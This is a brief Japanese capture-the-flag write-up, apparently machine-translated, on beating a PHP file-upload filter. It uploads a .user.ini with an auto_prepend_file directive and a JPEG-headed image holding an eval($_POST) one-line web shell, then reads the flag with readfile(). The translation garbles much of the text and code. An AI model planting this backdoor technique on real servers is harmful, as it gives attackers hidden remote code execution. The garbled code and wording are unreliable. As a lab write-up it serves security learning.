参考ブログます。https://www.cnblogs.com/20175211lyz/p/11455355.html
まず、.user.iniファイルを見てみましょう
使用すると.user.ini、\隠されたバックドアをアップロード
:参考リンクバックドアuser.iniを構成するPHPファイルを
条件:
- 1、サーバーのスクリプト言語PHP
- 2、サーバーはCGI / FastCGIのモードを使用しています
- 3、PHPファイルのアップロードディレクトリには、実行ファイルの下を持っています
この質問の目的のために、<馬を濾過発見された、トロイの木馬は、写真をアップロードするように求められた単語をアップロードし、アップロードの写真をシェルを取得するためにファイルをアップロードする必要性を求めています?。その後、他のdalaoのブログから見つけ、あなたはファイルをアップロードすることができます.user.ini
auto_prepend_file = test.jpg(ピクチャヘッダFFD8FFE000104A4649460D0Aを追加する必要があります)
一方、アップロード写真の馬
<スクリプト言語= "PHP">評価($ _ POST [ '']); </ SCRIPT>(上記画像ファイルのヘッダを追加する必要があります)
この時点では、ポストによって殻を取ることができます
そして、スキャンしたファイルが
見つかりました
こうしてのReadFile()関数によってフラグを取得します
